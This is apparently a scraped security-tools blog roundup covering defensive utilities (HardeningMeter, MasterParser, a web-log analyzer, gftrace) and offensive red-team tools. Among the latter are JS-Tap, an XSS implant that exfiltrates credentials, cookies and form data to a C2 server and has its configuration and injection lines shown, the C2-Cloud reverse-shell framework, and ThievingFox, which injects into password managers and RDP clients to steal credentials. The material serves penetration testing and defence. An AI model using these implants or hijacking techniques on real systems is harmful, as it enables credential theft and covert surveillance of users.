- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)

[...]

Tracing multiple functions in the Sunshuttle malware:

- CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
- WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
- WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
- WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
- WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
- WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)

[...]

Tracing multiple functions in the DeimosC2 framework agent:

- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
- setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
- socket(0x2, 0x1, 0x6) = 0x138 (312)
- WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
- GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
- GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
- LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
- NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
- GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
- GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
- CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
- GetCurrentProcessId() = 0x2584 (9604)
- GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57 )

[...]

Future features:

  • [x] Support inspection of 32 bits files.
  • [x] Add support to files calling functions via the "IAT jmp table" instead of the API call directly in asmstdcall.
  • [x] Add support to cmdline parameters for the target process
  • [ ] Send the tracing log output to a file by default to make it better to filter. Currently there's no separation between the target file and gftrace output. An alternative is redirect gftrace output to a file using the command line.

:warning: Warning

  • The tool inspects the target binary dynamically and it means the file being traced is executed. If you're inspecting a malware or an unknown software please make sure you do it in a controlled environment.
  • Golang programs can be very noisy depending the file and/or function being traced (e.g. VirtualAlloc is always called multiple times by the runtime package, CreateFileW is called multiple times before a call to CreateProcessW, etc). The tool ignores the Golang runtime initialization noise but after that it's up to the user to decide what functions are better to filter in each scenario.

License

The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.



HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

By: Zion3R


HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)


Execute Scanning Example

Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.

python3 HardeningMeter.py -f /bin/cp -s

Installation Requirements

Before installing HardeningMeter, make sure your machine has the following: 1. readelf and file commands 2. python version 3 3. pip 4. tabulate

pip install tabulate

Install HardeningMeter

The very latest developments can be obtained via git.

Clone or download the project files (no compilation nor installation is required)

git clone https://github.com/OfriOuzan/HardeningMeter

Arguments

-f --file

Specify the files you want to scan, the argument can get more than one file seperated by spaces.

-d --directory

Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.

-e --external

Specify whether you want to add external checks (False by default).

-m --show_missing

Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.

-s --system

Specify if you want to scan the system hardening methods.

-c --csv_format'

Specify if you want to save the results to csv file (results are printed as a table to stdout by default).

Results

HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.

Notes

When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.



JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application

By: Zion3R


JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


Changelogs

Major changes are documented in the project Announcements:
https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

Demo

You can read the original blog post about JS-Tap here:
javascript-for-red-teams">https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

Short demo from ShmooCon of JS-Tap version 1:
https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
https://youtu.be/aWvNLJnqObQ?t=11719

A demo can also be seen in this webinar:
https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

Upgrade warning

I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

Introduction

JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

The example JS-Tap payload is contained in the telemlib.js file in the payloads directory, however any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using in an engagement strongly consider changing the naming of endpoints, stripping comments, and highly obfuscating the payload.

Make sure you review the configuration section below carefully before using on a publicly exposed server.

Data Collected

  • Client IP address, OS, Browser
  • User inputs (credentials, etc.)
  • URLs visited
  • Cookies (that don't have httponly flag set)
  • Local Storage
  • Session Storage
  • HTML code of pages visited (if feature enabled)
  • Screenshots of pages visited
  • Copy of Form Submissions
  • Copy of XHR API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body
  • Copy of Fetch API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body

Note: ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode only Fetch API can be copied currently.

Operating Modes

The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.

Trap Mode

Trap mode is typically the mode you would use as a XSS payload. Execution of XSS payloads is often fleeting, the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data.

Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. current location). The trap will set when the user visits the login page, and they'll hopefully contine into the authenticated portions of the application inside the iframe trap.

A user refreshing the page will generally break/escape the iframe trap.

Implant Mode

Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

Installation and Start

Requires python3. A large number of dependencies are required for the jsTapServer, you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

Example:

mkdir jsTapEnvironment
python3 -m venv jsTapEnvironment
source jsTapEnvironment/bin/activate
cd jsTapEnvironment
git clone https://github.com/hoodoer/JS-Tap
cd JS-Tap
pip3 install -r requirements.txt

run in debug/single thread mode:
python3 jsTapServer.py

run with gunicorn multithreaded (production use):
./jstapRun.sh

A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

Note that on Mac I also had to install libmagic outside of python.

brew install libmagic

Playing with JS-Tap locally is fine, but to use in a proper engagment you'll need to be running JS-Tap on publicly accessible VPS and setup JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

Configuration

JS-Tap Server Configuration

Debug/Single thread config

If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

Proxy Mode

For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.

When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.

Data Directory

The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.

Server Port

To change the server port configuration see the last line of jsTapServer.py

app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

Gunicorn Production Configuration

Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGNIX to also use multiple processes so you don't bottleneck on the proxy itself.

At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;

Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.

Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

telemlib.js Configuration

These configuration variables are in the initGlobals() function.

JS-Tap Server Location

You need to configure the payload with the URL of the JS-Tap server it will connect back to.

window.taperexfilServer = "https://127.0.0.1:8444";

Mode

Set to either trap or implant This is set with the variable:

window.taperMode = "trap";
or
window.taperMode = "implant";

Trap Mode Starting Page

Only needed for trap mode. See explanation in Operating Modes section above.
Sets the page the user starts on when the iFrame trap is set.

window.taperstartingPage = "http://targetapp.com/somestartpage";

If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

window.taperstartingPage = window.location.href;

Client Tag

Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served, you can have multiple JS-Tap payloads configured with different modes, start pages, and clien tags.

This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Setup multiple payloads, each with the appropriate configuration for the application its being used against, and add a tag indicating which app the client is running.

window.taperTag = 'whatever';

Custom Payload Tasks

Used to set if clients are checking for Custom Payload tasks, and how often they're checking. The jitter settings Let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.

window.taperTaskCheck        = true;
window.taperTaskCheckDelay = 5000;
window.taperTaskJitterBottom = -2000;
window.taperTaskJitterTop = 2000;

Exfiltrate HTML

true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.

window.taperexfilHTML = true;

Copy Form Submissions

true/false setting on whether to intercept a copy of all form posts.

window.taperexfilFormSubmissions = true;

MonkeyPatch APIs

Enable monkeypatching of XHR and Fetch APIs. This works in trap mode. In implant mode, only Fetch APIs are monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will re-write the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Not that jQuery based network calls will be captured in the XHR API, which jQuery uses under the hood for network calls.

window.monkeyPatchAPIs = true;

Screenshot after API calls

By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.

window.postApiCallScreenshot = true;
window.screenshotDelay = 1000;

JS-Tap Portal

Login with the admin credentials provided by the server script on startup.

Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

Each client has an 'x' button (near the star button). This allows you to delete the session for that client, if they're sending junk or useless data, you can prevent that client from submitting future data.

When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issues, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session in here.

Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.

Custom Payloads

Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

[{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]

The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

To run a payload on a single client user the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

Tools

A few tools are included in the tools subdirectory.

clientSimulator.py

A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

At the top of the script is a numClients variable, set to how many clients you want to simulator. The script will spawn a thread for each, retrieve a client session, and send data in simulating a client.

numClients = 50

You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

apiServer = "https://127.0.0.1:8444"

JS-Tap run using gunicorn scales quite well.

MonkeyPatchApp

A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general.

Run with:

python3 monkeyPatchLab.py

By default this will start the application running on:

https://127.0.0.1:8443

Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js

function injectPayload()
{
document.head.appendChild(Object.assign(document.createElement('script'),
{src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
}

formParser.py

Abandoned tool, is a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.

You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

generateIntelReport.py

No longer working, used before the web UI for JS-Tap. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons, most of it is stored in the datagbase with the exception of exfiltratred HTML code and screenshots.

Contact

@hoodoer
hoodoer@bitwisemunitions.dev



MasterParser - Powerful DFIR Tool Designed For Analyzing And Parsing Linux Logs

By: Zion3R


What is MasterParser ?

MasterParser stands as a robust Digital Forensics and Incident Response tool meticulously crafted for the analysis of Linux logs within the var/log directory. Specifically designed to expedite the investigative process for security incidents on Linux systems, MasterParser adeptly scans supported logs, such as auth.log for example, extract critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for Incident Responders. Beyond its immediate utility for DFIR teams, MasterParser proves invaluable to the broader InfoSec and IT community, contributing significantly to the swift and comprehensive assessment of security events on Linux platforms.


MasterParser Wallpapers

Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper

Supported Logs Format

This is the list of supported log formats within the var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis. |Supported Log Formats List| | --- | | auth.log |

Feature & Log Format Requests:

If you wish to propose the addition of a new feature \ log format, kindly submit your request by creating an issue Click here to create a request

How To Use ?

How To Use - Text Guide

  1. From this GitHub repository press on "<> Code" and then press on "Download ZIP".
  2. From "MasterParser-main.zip" export the folder "MasterParser-main" to you Desktop.
  3. Open a PowerSehll terminal and navigate to the "MasterParser-main" folder.
# How to navigate to "MasterParser-main" folder from the PS terminal
PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
  1. Now you can execute the tool, for example see the tool command menu, do this:
# How to show MasterParser menu
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
  1. To run the tool, put all your /var/log/* logs in to the 01-Logs folder, and execute the tool like this:
# How to run MasterParser
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
  1. That's it, enjoy the tool!

How To Use - Video Guide

https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70

MasterParser Social Media Publications

Social Media Posts
1. First Tool Post
2. First Tool Story Publication By Help Net Security
3. Second Tool Story Publication By Forensic Focus
4. MasterParser featured in Help Net Security: 20 Essential Open-Source Cybersecurity Tools That Save You Time


C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

By: Zion3R


The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2

Demo

C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

๐Ÿ”’ Anywhere Access: Reach the C2 Cloud from any location.
๐Ÿ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
๐Ÿ–ฑ๏ธ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
๐Ÿ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

๐Ÿ› ๏ธ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
๐Ÿ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
๐ŸŒ Nginx: Effortlessly routing traffic between web and backend systems.
๐Ÿ“จ Redis PubSub: Serving as a robust message broker for seamless communication.
๐Ÿš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
๐Ÿ’พ Postgres DB: Ensuring persistent storage for seamless continuity.

Architecture

Application setup

  • Management port: 9000
  • Reversse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chait_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

Credits

Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

License

Distributed under the MIT License. See LICENSE for more information.

Contact



OSTE-Web-Log-Analyzer - Automate The Process Of Analyzing Web Server Logs With The Python Web Log Analyzer

By: Zion3R


Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:


Features

  1. Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.

  2. Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.

  3. Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.

  4. User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.

Future Features

This project is actively developed, and future features may include:

  1. IP Geolocation: Identify the geographic location of IP addresses in the logs.
  2. Real-time Monitoring: Implement real-time monitoring capabilities for immediate threat detection.

Installation

The tool only requires Python 3 at the moment.

  1. step1: git clone https://github.com/OSTEsayed/OSTE-Web-Log-Analyzer.git
  2. step2: cd OSTE-Web-Log-Analyzer
  3. step3: python3 WLA-cli.py

Usage

After cloning the repository to your local machine, you can initiate the application by executing the command python3 WLA-cli.py. simple usage example : python3 WLA-cli.py -l LogSampls/access.log -t

use -h or --help for more detailed usage examples : python3 WLA-cli.py -h

Contact

linkdin:(https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228)



ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

By: Zion3R


ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.

The accompanying blog post can be found here


Installation

Linux

Rustup must be installed, follow the instructions available here : https://rustup.rs/

The mingw-w64 package must be installed. On Debian, this can be done using :

apt install mingw-w64

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu

Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

After adding Mono repositories, Nuget can be installed using apt :

apt install nuget

Finally, python dependancies must be installed :

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11.

Windows

Rustup must be installed, follow the instructions available here : https://rustup.rs/

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc

.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

Finally, python dependancies must be installed :

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11

NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)

Targets

All modules have been tested on the following Windows versions :

Windows Version
Windows Server 2022
Windows Server 2019
Windows Server 2016
Windows Server 2012R2
Windows 10
Windows 11

[!CAUTION] Modules have not been tested on other version, and are expected to not work.

Application Injection Method
KeePass.exe AppDomainManager Injection
KeePassXC.exe DLL Proxying
LogonUI.exe (Windows Login Screen) COM Hijacking
consent.exe (Windows UAC Popup) COM Hijacking
mstsc.exe (Windows default RDP client) COM Hijacking
RDCMan.exe (Sysinternals' RDP client) COM Hijacking
MobaXTerm.exe (3rd party RDP client) COM Hijacking

Usage

[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

ThievingFox contains 3 main modules : poison, cleanup and collect.

Poison

For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.

To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive).

--keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

[!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
